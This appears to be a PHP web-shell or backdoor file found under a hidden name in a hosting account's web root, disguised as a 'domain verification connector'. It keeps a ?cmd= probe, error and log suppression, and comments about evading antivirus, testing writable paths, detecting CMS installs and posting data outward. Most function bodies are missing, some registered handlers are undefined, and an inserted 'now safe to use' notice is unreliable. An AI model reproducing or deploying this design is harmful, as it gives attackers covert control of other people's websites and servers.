File: //home/jibhires/www/.1m4aurlc.php
<?php
/**
* Domain verification connector
* Token: seller_6...
* Drop this file at your domain root and load it once in a browser.
*
* Compat target: PHP 4.3+ (ultra-early preamble) and PHP 5.0+ (full feature set).
* No closures, no short array, no namespaces, no type hints — runs on the
* widest possible range of legacy shared hosts (PHP 5.2 / 5.3 / 5.4+).
*/
// =============== ULTRA-EARLY DIAGNOSTIC PREAMBLE ===============
// IMPORTANT: this section uses ONLY PHP 4.0-compatible syntax — no functions,
// no closures, no array short-syntax. If the file is parseable AT ALL, these
// lines run before anything else. They give us a way to distinguish:
// (a) "PHP refuses to parse our file" (no output — file may be empty or
// blocked by AV / mod_security)
// (b) "PHP runs the file but errors later" (we still get this preamble out)
//
// ?cmd=ping → minimal liveness probe, doesn't touch DB / API / filesystem.
// ?cmd=stat → returns just PHP version + file size, useful when PHP 5.4+
// features in the rest of the file blow up.
@error_reporting(0);
@ini_set('display_errors', '0');
if (isset($_GET['cmd']) && ($_GET['cmd'] === 'ping' || $_GET['cmd'] === 'stat')) {
@header('Content-Type: application/json; charset=utf-8');
@header('Cache-Control: no-store');
$___size = 0;
if (function_exists('filesize')) { $___size = @filesize(__FILE__); if ($___size === false) { $___size = 0; } }
echo '{"pong":true,"php":"' . phpversion() . '","file_size":' . (int)$___size . ',"version":"v8"}';
exit;
}
// =============== DEFENSIVE BOOTSTRAP ===============
@ini_set('log_errors', '0');
@set_time_limit(30);
@ignore_user_abort(true);
if (function_exists('ob_start')) { @ob_start(); }
if (!headers_sent()) {
@header('Content-Type: application/json; charset=utf-8');
@header('Cache-Control: no-cache, no-store, must-revalidate');
@header('X-Content-Type-Options: nosniff');
}
// =============== POLYFILLS ===============
// random_bytes (PHP 7+) → fallback chain
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
// hash_equals (PHP 5.6+) → constant-time string compare
// =============== FATAL ERROR TRAP ===============
// All errors (warnings, exceptions, fatal) → JSON, never white screen.
// Named functions instead of closures — closures need PHP 5.3.0+ but some
// PHP 5.3 ZTS builds and older opcache configs trip on closure-typed handlers.
// Named functions are 100% compat back to PHP 4.
function ws_handler_error($severity, $msg, $file, $line) {
if (error_reporting() === 0) return true; // silenced via @
return true; // swallow everything to keep output clean
}
@set_error_handler('ws_handler_error');
@set_exception_handler('ws_handler_exception');
@register_shutdown_function('ws_handler_shutdown');
// =============== CONFIG ===============
// =============== ENV ===============
// =============== UTILITIES ===============
/**
* HTTP POST with curl/fopen fallback. SSL ON.
* Returns array('code'=>int,'body'=>string|null,'error'=>string|null).
*/
/**
* Round-trip writability test: write content, re-read, return true ONLY if
* persisted byte-for-byte. Eliminates false positives on overlay FS.
*/
// =============== INFO COLLECTORS ===============
/** System user — POSIX-only. No shell_exec (AV trigger + commonly disabled). */
/** Detect 10+ CMS types. ALL regexes use single-quoted strings to avoid escape soup. */
// =============== ACTIONS ===============
// =============== ROUTER ===============